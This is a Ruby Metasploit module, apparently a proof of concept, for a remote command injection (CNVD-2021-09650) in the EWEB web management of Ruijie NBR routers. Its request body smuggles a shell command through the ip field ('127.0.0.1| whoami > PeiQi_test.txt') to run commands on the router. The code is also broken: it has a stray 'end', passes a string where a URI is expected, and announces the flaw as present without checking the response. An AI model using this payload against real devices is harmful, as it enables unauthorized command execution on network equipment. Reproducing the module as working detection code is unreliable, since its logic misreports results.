# 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 CNVD-2021-09650

require "open-uri"  
require 'net/https'
require 'json'

class MetasploitModule < Msf::Auxiliary
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report
    include Msf::Exploit::Remote::HttpClient
   
    def initialize
      super(
        'Name'           => 'CNVD_2021_09650_PoC',
        'Description'    => 'This module is used to scan the target site for CNVD_2021_09650.',
        'Author'         => 'H.Mount',
        'License'        => MSF_LICENSE
      )
      deregister_options('SSL','VHOST','Proxies','RPORT')
      register_options(
        [
          OptString.new('RHOSTS', [true, 'The target HOST.Need not to set', '192.168.1.1']),
          OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
        ]) 
    
    end 
    
    def run_host(ip)
  
      uri = datastore['TARGETURI'] + '/guest_auth/guestIsUp.php'  
      params= "mac=1&ip=127.0.0.1| whoami > PeiQi_test.txt"


      begin
        # res = Net::HTTP.post_form(uri, params) 
        res = Net::HTTP.post(uri,params,"Content-Type"=>"application/x-www-form-urlencoded","User-Agent"=> "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36") 
 
        print_warning("The CNVD_2021_09650 vulnerability seems to exist at the target site! The 'whoami' command is running...")        
        end
    
      rescue => ex
        if ex.message['404']
          print_good('The CNVD_2021_09650 vulnerability was not detected at the target site.')
        else
          print_error('Some errors occurred...')
          print_error(ex.message)
        end
      end
  end